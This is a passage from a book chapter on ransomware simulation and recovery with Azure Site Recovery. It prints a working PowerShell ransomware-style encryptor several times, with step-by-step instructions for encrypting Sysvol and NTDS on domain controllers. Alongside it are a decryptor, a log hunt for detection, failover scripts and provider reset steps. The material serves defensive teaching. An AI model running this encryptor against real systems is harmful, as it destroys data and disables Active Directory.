    [Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
    [Byte[]]$LenKey = [System.BitConverter]::GetBytes([Int]$KeyEncrypted.Length)
    [Byte[]]$LenIV  = [System.BitConverter]::GetBytes([Int]$AesProvider.IV.Length)

    # Output layout: [4-byte key length][4-byte IV length][wrapped key][IV][AES-CBC ciphertext]
    # Written to a temp file first, then moved over the original.
    $TempFile = Join-Path $env:TEMP $FileToEncrypt.Name
    Try { $FileStreamWriter = New-Object System.IO.FileStream($TempFile, [System.IO.FileMode]::Create) }
    Catch { Write-Error "Unable to open output file for writing."; Return }
    $FileStreamWriter.Write($LenKey, 0, 4)
    $FileStreamWriter.Write($LenIV, 0, 4)
    $FileStreamWriter.Write($KeyEncrypted, 0, $KeyEncrypted.Length)
    $FileStreamWriter.Write($AesProvider.IV, 0, $AesProvider.IV.Length)

    $Transform = $AesProvider.CreateEncryptor()
    $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)

    Try { $FileStreamReader = New-Object System.IO.FileStream($FileToEncrypt.FullName, [System.IO.FileMode]::Open) }
    Catch { Write-Error "Unable to open input file for reading."; $CryptoStream.Close(); Return }
    [Byte[]]$Data = New-Object Byte[] 4096
    Do
    {
        $Count = $FileStreamReader.Read($Data, 0, $Data.Length)
        $CryptoStream.Write($Data, 0, $Count)
    }
    While ($Count -gt 0)

    $CryptoStream.FlushFinalBlock()
    $CryptoStream.Close()
    $FileStreamReader.Close()
    $FileStreamWriter.Close()

    # Replace the plaintext with the encrypted copy
    Move-Item -Path $TempFile -Destination $FileToEncrypt.FullName -Force
}

# Encrypt each file
foreach ($file in $FilesToEncrypt)
{
    Write-Host "Encrypting $file"
    Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}
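Because the script above leaves the certificate's private key in LocalMachine\My, the damage it does in the lab can be reversed, and writing the decryptor is the clearest way to understand the file layout it produces. The following is an added example, not code from the book: it reads the header Encrypt-File writes ([4-byte key length][4-byte IV length][RSA-wrapped AES key][IV]), unwraps the AES key with the certificate's RSA private key using the same PKCS#1 v1.5 padding, and decrypts the body. The target folder and certificate subject are the ones the chapter uses; with real ransomware the private key is with the attacker and this step is exactly what you cannot do.

```powershell
# Added example (not from the book): inverse of Encrypt-File for the lab test folder.
function Decrypt-File {
    param(
        [Parameter(Mandatory)][System.IO.FileInfo]$File,
        [Parameter(Mandatory)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert
    )
    if (-not $Cert.HasPrivateKey) { throw "Certificate $($Cert.Thumbprint) has no private key; cannot unwrap the AES key" }

    $reader = New-Object System.IO.FileStream($File.FullName, [System.IO.FileMode]::Open)
    try {
        # Header: two little-endian Int32 lengths, then the wrapped key and the IV.
        $lenBuf = New-Object Byte[] 4
        [void]$reader.Read($lenBuf, 0, 4); $lenKey = [BitConverter]::ToInt32($lenBuf, 0)
        [void]$reader.Read($lenBuf, 0, 4); $lenIV  = [BitConverter]::ToInt32($lenBuf, 0)
        if ($lenKey -lt 128 -or $lenKey -gt 1024 -or $lenIV -ne 16) {
            throw "$($File.Name): header does not look like Encrypt-File output (key len $lenKey, IV len $lenIV)"
        }
        $wrapped = New-Object Byte[] $lenKey; [void]$reader.Read($wrapped, 0, $lenKey)
        $iv      = New-Object Byte[] $lenIV;  [void]$reader.Read($iv, 0, $lenIV)

        # Unwrap with the RSA private key. GetRSAPrivateKey works for both CAPI and
        # CNG keys, which New-SelfSignedCertificate creates by default.
        $rsa    = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($Cert)
        $aesKey = $rsa.Decrypt($wrapped, [System.Security.Cryptography.RSAEncryptionPadding]::Pkcs1)

        $aes = New-Object System.Security.Cryptography.AesManaged
        $aes.KeySize = 256; $aes.BlockSize = 128
        $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Key = $aesKey; $aes.IV = $iv

        # The rest of the stream is the AES-CBC body with PKCS#7 padding.
        $tmp    = Join-Path $env:TEMP "$($File.Name).dec"
        $writer = New-Object System.IO.FileStream($tmp, [System.IO.FileMode]::Create)
        $crypto = New-Object System.Security.Cryptography.CryptoStream($reader, $aes.CreateDecryptor(), [System.Security.Cryptography.CryptoStreamMode]::Read)
        try   { $crypto.CopyTo($writer) }          # a padding error here means wrong key or a corrupted file
        finally { $crypto.Dispose(); $writer.Dispose() }   # disposing the CryptoStream also closes $reader
    }
    finally { $reader.Dispose() }

    Move-Item -Path $tmp -Destination $File.FullName -Force
    "Decrypted $($File.FullName)"
}

$Target = 'C:\Users\Administrator.MMSMOA\AppData\Local\RnSimulator\TestFolder\Tests\1-Tests'   # chapter's test folder
$Cert = Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.Subject -eq 'CN=ransomware.mmsmoa.local' -and $_.HasPrivateKey } |
    Select-Object -First 1
if (-not $Cert) { throw 'No ransomware.mmsmoa.local certificate with a private key in LocalMachine\My' }
Get-ChildItem -Recurse -File -Path $Target | ForEach-Object { Decrypt-File -File $_ -Cert $Cert }
```

Run it only against files the script above encrypted; the header check throws on anything else rather than overwriting it with garbage.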

Instructions / Screenshot (if applicable)

1. Open PowerShell ISE and run as Administrator.

2. Run this code to select the target folder. We will use one of the sample RanSim folders:

Add-Type -AssemblyName System.Windows.Forms
$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath

3. C:\Users\Administrator.MMSMOA\appdata\local\RnSimulator\TestFolder\Tests\1-Tests

4. Select the folder and click OK.


5. Create a new Self Signed Certificate:

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

6. Copy the thumbprint to the clipboard.

7. Run the following to put the Certificate into the $Cert Variable:

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C89DA4DBCD)
$Cert

8. Then grab the files from the folder:

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} -ErrorAction SilentlyContinue
$FilestoEncrypt

9. Run the Encrypt-File Function:

Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
Catch { Write-Error "Could not load required assembly."; Return }

$AesProvider = New-Object System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}

10. Try encrypting your files:

foreach ($file in $FilesToEncrypt)
{
Write-Host "Encrypting $file"
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}


11. The ransomware attack was successful and bypassed Windows Defender, ATP, and Ransomware Protection.

12. I renamed one of the files and took the .exe off the end; it is indeed encrypted.
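Real-time antivirus is not the only place the simulation leaves a trace. Because it runs as an interactive PowerShell script, the .NET crypto calls it makes are recorded by PowerShell script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) whenever that policy is switched on. The hunt below is an added example written for this edition, not code from the book; it assumes "Turn on PowerShell Script Block Logging" has been enabled by Group Policy on the host being checked, and it looks for the same type and method names the script above uses.

```powershell
# Added example (not from the book): hunt script block logs for the crypto primitives
# the simulation script uses. Assumes script block logging is enabled by policy;
# without it the Operational log contains no 4104 events and nothing is returned.
$Indicators = @(
    'AesManaged', 'CreateEncryptor', 'CryptoStream',
    'RSAPKCS1KeyExchangeFormatter', 'FlushFinalBlock'
)
$Since = (Get-Date).AddHours(-24)

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = $Since
} -ErrorAction SilentlyContinue   # no events at all is not an error for a hunt

$hits = foreach ($e in $events) {
    # For a 4104 event the logged script text is property index 2 (ScriptBlockText)
    $text = [string]$e.Properties[2].Value
    $matched = $Indicators | Where-Object { $text -match [regex]::Escape($_) }
    # A single crypto type is common in legitimate scripts; three or more together
    # is the file-encryption pattern shown in this chapter.
    if ($matched.Count -ge 3) {
        $flat = $text -replace '\s+', ' '
        [pscustomobject]@{
            Time       = $e.TimeCreated
            Computer   = $e.MachineName
            User       = $e.UserId
            Indicators = ($matched -join ', ')
            Snippet    = $flat.Substring(0, [Math]::Min(120, $flat.Length))
        }
    }
}

$hits | Sort-Object Time | Format-Table -AutoSize
```

Run it on the machine where the simulation was executed; each hit shows who ran the block and when, which is the timeline information needed later in this chapter to pick a recovery point that predates the attack.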

151
Chapter 7 Recovering from Ransomware using Azure Site Recovery

Chapter 7

Recovering from Ransomware using Azure Site Recovery

Notes from the Field

Why Air-gapped Replicas are the only choice

So what is an air-gapped backup anyway? Here is what Wikipedia has to say:

An air gap, air wall or air gapping is a network security measure employed on one or more
computers to ensure that a secure computer network is physically isolated from unsecured
networks, such as the public Internet or an unsecured local area network. It means a computer or
network has no network interfaces connected to other networks, with a physical or conceptual air
gap, analogous to the air gap used in plumbing to maintain water quality.

In layman's terms, it means that you must keep a copy of your backups and replicas offline.

Why Planned Failover is no longer an option

Planned Failover is the normal process of failing over to replica recovery points at a different location. The planned failover process does the following:

1. Once kicked off, it takes a final sync of the source machines.

2. Once that replication completes, it turns off the source Virtual Machine.

3. At this point, it takes one final sync to capture the remaining changes. This can only be done once the Virtual Machine is off. Think of a SQL Server or Exchange Server that was processing transactions during the first sync. The system cannot guarantee all of the records are there until the Virtual Machine is off. That is why it shuts down the source machine to complete the final delta sync.

4. Once the sync is completed, the Virtual Machine is powered on in your Microsoft Azure tenant.

Why will this not work in a ransomware situation? Because if the source machine was infected and the files were encrypted, you just took the encrypted files up to Azure and turned on the Virtual Machine.

Failover Now is the only Option

With the Planned Failover process not viable for us, the only option is to use the Failover Now (Failover) option. This allows us to select a point in time and simply power on the Virtual Machine from it.

1. The steps to perform Failover Now are easier and faster than a planned failover. First, you choose the Virtual Machine from the Azure Recovery Vault.

2. Next, you select the Failover button.

3. Choose the restore point.

4. Turn on the VM.

The total amount of time to turn on an air-gapped replica virtual machine is minutes.

Watch your Six (Clock)

When dealing with a ransomware incident, nobody is going to have your back. You do not have the luxury of time when it comes to a ransomware attack. If you had configured a maximum of 30 restore points in Azure, the clock is ticking. If the source Virtual Machine is still on, your Azure Site Recovery jobs are still bringing the nonviable recovery points into your vault. If you outrun the number of restore points and all you have is infected or cryptoed files, then Azure Site Recovery was pointless.

Do not connect your Azure Site Recovery Virtual Machines to a live Site-to-Site VPN

There is a big difference between traditional Disaster Recovery protection and the level of protection that is required to survive a ransomware attack. Think of it this way: many of us run a live Domain Controller in the cloud. What happens when we have a live incident and the source on-prem side is compromised? Do you think that Azure Virtual Machine running as a domain controller is safe?

Earlier in the book, we showed you what an admin-level ransomware attack looked like for core infrastructure roles like Domain Controllers. What this means for you is that you must keep tight control and maintain the "Air Gap" between your on-prem infrastructure and the cloud.

Once you have safely recovered to a previous recovery point and cleaned up the on-prem side, you will be able to set up a Site-to-Site VPN to give users access.

When can I get back into my data?

Oh, do I love the phone calls of people screaming at me wondering when they will be able to get their data back. What they don't understand is that they are lucky we have any data at all. If you didn't have an air-gapped backup and DR solution, you could be looking at something like this:

Dear CEO,

I think it is the time that we notify the public of the breach that has occurred on 04/13/2019.
None of our services will be viable for the next foreseeable future. You should look at issuing a
public statement and having our teams contact our business partners. Those million dollar
shipment of supplies will not be arriving on time. Blah Blah


If you think that this situation doesn't happen, you are dead wrong. If you ask a room of IT Professionals how many have been impacted by some type of ransomware attack in the past 3 years, most of them would put their hands up.

So, the short answer to the question "When can I get my data back?" is: as soon as we can.

Trust me on this one point, my friends: if you have the option of nothing or a recovery point that is 24 or 48 hours old, the business will be extremely thankful that they have something to keep going.

The painstaking process of rekeying data after a ransomware attack is something that you won't be able to overcome.

Our first and primary concern is getting them back at all.

Ok, so I didn't listen and lost everything. Now what?

If you didn't have an air-gapped solution and you lost everything, now what? Well, it becomes one giant salvage operation, starting here:

1. Rebuilding Core Infrastructure Roles

a. Active Directory

b. DNS

c. DHCP

2. Rebuilding all the Workstations

3. Rebuilding SQL, Exchange, SharePoint

4. Praying your backups go back far enough

You are talking about weeks if not months of downtime for some of these services, if not all of them.

Don't forget to tune your Replication Policy

Your Replication Policy determines how many recovery points you have available. What does this mean to you, the IT Pro or Cloud Admin? It means this is the amount of time you have to make a decision when a ransomware attack occurs. If you only have 7 days' worth of recovery points in the cloud, you have a maximum of 7 days to make a decision. You cannot take the weekend off if you get a ransomware attack. You must act immediately and make a decision. The nice part about being able to recover in the cloud is that you can actually recover offline and not directly connect back to the core infrastructure.

Testing Failover can be a quick Ransomware Fix

Using the Test Failover option can be a very quick ransomware fix for your organization. With this option, you can quickly create a portable environment to either get files back or to check the viability of your Azure Site Recovery points. We often recommend to our clients that they should be testing their recovery points quarterly. This is safe to do in an offline environment and doesn't take that long to complete.
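The Failover Now steps, the retention-window warning from "Watch your Six" and the quarterly test failover described above can all be driven from PowerShell instead of the portal, which makes the choice of recovery point a timestamp comparison rather than a guess from a drop-down. The script below is an added example written for this edition, not code from the book or from Microsoft; it uses the Az.RecoveryServices module cmdlets (Get-AzRecoveryServicesVault, Set-AzRecoveryServicesAsrVaultContext, Get-AzRecoveryServicesAsrRecoveryPoint, Start-AzRecoveryServicesAsrTestFailoverJob, Start-AzRecoveryServicesAsrUnplannedFailoverJob and the matching cleanup and commit jobs). The vault, resource group, VM and test network names, and the assumed infection time, are placeholders you replace with your own values.

```powershell
# Added example (not from the book): "Failover Now" to the newest recovery point that
# predates the attack, or a test failover to an isolated network for the quarterly drill.
# Requires: Install-Module Az.RecoveryServices; Connect-AzAccount
$VaultName     = 'asr-vault-placeholder'        # placeholder
$ResourceGroup = 'rg-asr-placeholder'           # placeholder
$ProtectedVm   = 'DC01'                         # name as shown under Replicated items
$InfectionTime = Get-Date '2019-04-13 06:00'    # assumed: earliest moment the attack could have started
$DryRun        = $true                          # $true = test failover + cleanup, $false = real failover + commit
$TestVnetId    = '/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Network/virtualNetworks/asr-test-isolated'  # placeholder

$vault = Get-AzRecoveryServicesVault -Name $VaultName -ResourceGroupName $ResourceGroup
Set-AzRecoveryServicesAsrVaultContext -Vault $vault | Out-Null

# Step 1: find the replicated item (fabric -> protection container -> protected item)
$item = Get-AzRecoveryServicesAsrFabric |
    ForEach-Object { Get-AzRecoveryServicesAsrProtectionContainer -Fabric $_ } |
    ForEach-Object { Get-AzRecoveryServicesAsrReplicationProtectedItem -ProtectionContainer $_ } |
    Where-Object { $_.FriendlyName -eq $ProtectedVm }
if (-not $item) { throw "'$ProtectedVm' is not a replicated item in vault $VaultName" }

# Step 3: list the retained points and pick the newest one taken BEFORE the infection.
# If none is left, retention has been outrun and the vault only holds encrypted copies.
$points = Get-AzRecoveryServicesAsrRecoveryPoint -ReplicationProtectedItem $item |
    Sort-Object RecoveryPointTime -Descending
$points | Select-Object Name, RecoveryPointTime, RecoveryPointType | Format-Table -AutoSize

$clean = $points | Where-Object { $_.RecoveryPointTime -lt $InfectionTime } | Select-Object -First 1
if (-not $clean) {
    throw "Oldest point is $($points[-1].RecoveryPointTime); nothing older than $InfectionTime remains in the vault."
}
"Using recovery point $($clean.Name) from $($clean.RecoveryPointTime)"

# Poll an ASR job until it finishes; anything but Succeeded stops the script.
function Wait-AsrJob($Job) {
    while (($Job = Get-AzRecoveryServicesAsrJob -Job $Job).State -in 'NotStarted', 'InProgress') { Start-Sleep -Seconds 30 }
    if ($Job.State -ne 'Succeeded') { throw "$($Job.DisplayName) ended in state $($Job.State)" }
}

if ($DryRun) {
    # Quarterly drill: the test VM comes up on an isolated vNet, the source and the
    # replica are untouched, and the cleanup job removes the test VM afterwards.
    Wait-AsrJob (Start-AzRecoveryServicesAsrTestFailoverJob -ReplicationProtectedItem $item `
                    -Direction PrimaryToRecovery -RecoveryPoint $clean -AzureVMNetworkId $TestVnetId)
    Read-Host "Test VM for $ProtectedVm is running from $($clean.RecoveryPointTime). Check your files, then press Enter to clean up"
    Wait-AsrJob (Start-AzRecoveryServicesAsrTestFailoverCleanupJob -ReplicationProtectedItem $item -Comment 'quarterly recovery point test')
}
else {
    # Steps 2-4 for real: the portal's "Failover" button is an unplanned failover.
    # No final sync is taken from the (infected) source; the VM is powered on in Azure
    # from the chosen point, then committed so it becomes the live copy.
    Wait-AsrJob (Start-AzRecoveryServicesAsrUnplannedFailoverJob -ReplicationProtectedItem $item `
                    -Direction PrimaryToRecovery -RecoveryPoint $clean)
    Wait-AsrJob (Start-AzRecoveryServicesAsrCommitFailoverJob -ReplicationProtectedItem $item)
    "$ProtectedVm is running in Azure from $($clean.RecoveryPointTime)"
}
```

Keep $DryRun set to $true for the quarterly check; the test network must be one with no route back to on-prem, for the same air-gap reason given in the Site-to-Site VPN section above.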

Reset Settings for your Azure Site Recovery Hyper-V Host

Sometimes it can be difficult to add hosts from Windows Admin Center into Azure Site Recovery. The following script will help take care of error messages like this.

To resolve the issue, I had to run a Reset Script on the host to wipe all the settings.

pushd .
try
{
    $windowsIdentity=[System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal=new-object System.Security.Principal.WindowsPrincipal($windowsIdentity)
    $administrators=[System.Security.Principal.WindowsBuiltInRole]::Administrator
    $isAdmin=$principal.IsInRole($administrators)
    if (!$isAdmin)
    {
        "Please run the script as an administrator in elevated mode."
        $choice = Read-Host
        return;
    }

    $error.Clear()
    "This script will remove the old Azure Site Recovery Provider related properties. Do you want to continue (Y/N) ?"
    $choice = Read-Host

    if (!($choice -eq 'Y' -or $choice -eq 'y'))
    {
        "Stopping cleanup."
        return;
    }

    # Stop the ASR provider service (dra) before touching its registration state
    $serviceName = "dra"
    $service = Get-Service -Name $serviceName
    if ($service.Status -eq "Running")
    {
        "Stopping the Azure Site Recovery service..."
        net stop $serviceName
    }

    $asrHivePath = "HKLM:\SOFTWARE\Microsoft\Azure Site Recovery"
    $registrationPath = $asrHivePath + '\Registration'
    $proxySettingsPath = $asrHivePath + '\ProxySettings'
    $draIdvalue = 'DraID'
    $idMgmtCloudContainerId='IdMgmtCloudContainerId'

    if (Test-Path $asrHivePath)
    {
        if (Test-Path $registrationPath)
        {
            "Removing registration related registry keys."
            Remove-Item -Recurse -Path $registrationPath
        }

        if (Test-Path $proxySettingsPath)
        {
            "Removing proxy settings"
            Remove-Item -Recurse -Path $proxySettingsPath
        }

        $regNode = Get-ItemProperty -Path $asrHivePath
        if($regNode.DraID -ne $null)
        {
            "Removing DraId"
            Remove-ItemProperty -Path $asrHivePath -Name $draIdValue
        }
        if($regNode.IdMgmtCloudContainerId -ne $null)
        {
            "Removing IdMgmtCloudContainerId"
            Remove-ItemProperty -Path $asrHivePath -Name $idMgmtCloudContainerId
        }
        "Registry keys removed."
    }

    # First retrieve all the certificates to be deleted
    $ASRcerts = Get-ChildItem -Path cert:\localmachine\my | where-object {$_.friendlyname.startswith('ASR_SRSAUTH_CERT_KEY_CONTAINER') -or $_.friendlyname.startswith('ASR_HYPER_V_HOST_CERT_KEY_CONTAINER')}
    # Open a cert store object
    $store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
    $store.Open('ReadWrite')
    # Delete the certs
    "Removing all related certificates"
    foreach ($cert in $ASRcerts)
    {
        $store.Remove($cert)
    }
    $store.Close()
}
catch [System.Exception]
{
    Write-Host "Error occurred" -ForegroundColor "Red"
    $error[0]
    Write-Host "FAILED" -ForegroundColor "Red"
}
popd


Enable Diagnostic Logging for Azure Site Recovery

To enable debug logging for the ASR Provider, use the following steps:

Open an elevated PowerShell window and then run the following commands to create your trace definition:

logman create trace ASRDebug -v mmddhhmm -o C:\temp\asr.etl -cnf 01:00:00 -nb 10 250 -bs 16 -ow -y
logman update ASRDebug -p "Microsoft-Azure Site Recovery-Provider" 0x8000000000000000 0x5
logman update ASRDebug -p "MicrosoftAzureRecoveryServices" 0xC000000000000000 0x5

Note: The default location specified above is C:\temp. You may safely change this value if needed. The folder will be created if it does not exist.

Start the trace by typing the following command in the elevated Windows PowerShell window:

logman start ASRDebug

Reproduce your issue.

As soon as you reproduce your issue, stop the trace by typing the following command:

logman stop ASRDebug

Convert the trace to readable text:

netsh trace convert <filename>

Collect debug logs from the folder <installation folder>\Temp. The default location will be C:\Program Files\Microsoft Azure Recovery Services Agent\Temp.


Zero Day time to Failover

Assuming an Admin Level breach: Failing over 100% to Azure

In this scenario, we are going to look at an attack that takes place directly on your Domain Controllers. This is the worst case for a ransomware-type attack because the attacker is not looking for an immediate payment; they have hacked into your system and are directly executing the attack.

Note: This scenario is based on real-life events that took place 2 years ago. The client in question had their Admin credentials compromised via an online cloud backup provider. The attackers gained access to the backups and were able to crack the NTDS.dit (Active Directory database) offline. Then, at their leisure, they could come and go. They executed this sophisticated attack on the customer's busiest day of the year.

To showcase an attack like this, we are going to use PowerShell with Administrative privileges. You will notice how none of Windows Defender's protection policies catch this.

We will do two things in this attack: First, we will encrypt the Sysvol folder on a single domain controller. Second, we will take down Active Directory by encrypting the C:\Windows\NTDS folder on each domain controller.

All of these steps were performed in a lab environment. Please do not try any of these steps in production.

Executing a PowerShell based Ransomware Attack on Domain Controllers


The code below is only to be used for testing purposes. Do NOT run this in a production environment. None of the authors of this book take any responsibility for your actions.

Windows Defender will not pick this attack up because it was executed with Administrative credentials. This means that, in this case, you are now the victim of a ransomware attack.

Add-Type -AssemblyName System.Windows.Forms
$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath

#global variables
$csv = "C:\windows\temp\drives.csv"

#Define the cert to use for encryption
#Create your own cert with this command;
New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local
$Cert = $(Get-ChildItem Cert:\LocalMachine\My\60BD2E50C9EB3937CB3DA6FBF2C5ACC925F3C00A)
$Cert

#discover the other folders beneath the selectedpath
$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) -and ( $_.Name -like "*$fileName*") } | % {$_.FullName} -ErrorAction SilentlyContinue
$FilestoEncrypt

Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
Catch { Write-Error "Could not load required assembly."; Return }

# Per-file AES-256-CBC session key, wrapped with the certificate's RSA public key
$AesProvider = New-Object System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
# File header: key length, IV length, wrapped key, IV; ciphertext follows
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
[Byte[]]$Data = New-Object Byte[] $BlockSizeBytes
[Int]$BytesRead = 0
Try { $FileStreamReader = New-Object System.IO.FileStream("$($FilesToEncrypt.FullName)", [System.IO.FileMode]::Open) }
Catch { Write-Error "Unable to open input file for reading."; Return }
Do
{
$Count = $FileStreamReader.Read($Data, 0, $BlockSizeBytes)
$Offset += $Count
$CryptoStream.Write($Data, 0, $Count)
$BytesRead += $BlockSizeBytes
}
While ($Count -gt 0)

$CryptoStream.FlushFinalBlock()
$CryptoStream.Close()
$FileStreamReader.Close()
$FileStreamWriter.Close()
# The encrypted temp copy overwrites the original file in place
copy-Item -Path $($env:temp+$FilesToEncrypt.Name) -Destination $FilesToEncrypt.FullName -Force
}

#Encrypt each file
foreach ($file in $FilesToEncrypt)
{
Write-Host "Encrypting $file"
Encrypt-File $file $Cert -ErrorAction SilentlyContinue
}

Exit

Encrypting the Sysvol Folder

Instructions / Screenshot (if applicable)

1. Logon to DC01 as Administrator.

2. Open PowerShell ISE and run as Administrator, then run:

Add-Type -AssemblyName System.Windows.Forms
$FolderBrowser = New-Object System.Windows.Forms.FolderBrowserDialog
[void]$FolderBrowser.ShowDialog()
$FolderBrowser.SelectedPath

3. Browse to C:\windows\Sysvol and click OK.

4. Create a new Self Signed Certificate:

New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname ransomware.mmsmoa.local

5. Copy the thumbprint to the clipboard.


6. Run the following to put the Certificate into the $Cert Variable:

$Cert = $(Get-ChildItem Cert:\LocalMachine\My\7BD220D0D93475829CD40B4C1A67C2C89DA4DBCD)
$Cert

7. Then grab the files from the folder:

$FilesToEncrypt = Get-ChildItem -recurse -Force -Path $FolderBrowser.SelectedPath | Where-Object { !($_.PSIsContainer -eq $true) } | % {$_.FullName} -ErrorAction SilentlyContinue
$FilestoEncrypt

8. Run the Encrypt-File Function:

Function Encrypt-File
{
Param([Parameter(mandatory=$true)][System.IO.FileInfo]$FilesToEncrypt,
[Parameter(mandatory=$true)][System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)

Try { [System.Reflection.Assembly]::LoadWithPartialName("System.Security.Cryptography") }
Catch { Write-Error "Could not load required assembly."; Return }

$AesProvider = New-Object System.Security.Cryptography.AesManaged
$AesProvider.KeySize = 256
$AesProvider.BlockSize = 128
$AesProvider.Mode = [System.Security.Cryptography.CipherMode]::CBC
$KeyFormatter = New-Object System.Security.Cryptography.RSAPKCS1KeyExchangeFormatter($Cert.PublicKey.Key)
[Byte[]]$KeyEncrypted = $KeyFormatter.CreateKeyExchange($AesProvider.Key, $AesProvider.GetType())
[Byte[]]$LenKey = $Null
[Byte[]]$LenIV = $Null
[Int]$LKey = $KeyEncrypted.Length
$LenKey = [System.BitConverter]::GetBytes($LKey)
[Int]$LIV = $AesProvider.IV.Length
$LenIV = [System.BitConverter]::GetBytes($LIV)
$FileStreamWriter
Try { $FileStreamWriter = New-Object System.IO.FileStream("$($env:temp+$FilesToEncrypt.Name)", [System.IO.FileMode]::Create) }
Catch { Write-Error "Unable to open output file for writing."; Return }
$FileStreamWriter.Write($LenKey, 0, 4)
$FileStreamWriter.Write($LenIV, 0, 4)
$FileStreamWriter.Write($KeyEncrypted, 0, $LKey)
$FileStreamWriter.Write($AesProvider.IV, 0, $LIV)
$Transform = $AesProvider.CreateEncryptor()
$CryptoStream = New-Object System.Security.Cryptography.CryptoStream($FileStreamWriter, $Transform, [System.Security.Cryptography.CryptoStreamMode]::Write)
[Int]$Count = 0
[Int]$Offset = 0
[Int]$BlockSizeBytes = $AesProvider.BlockSize / 8
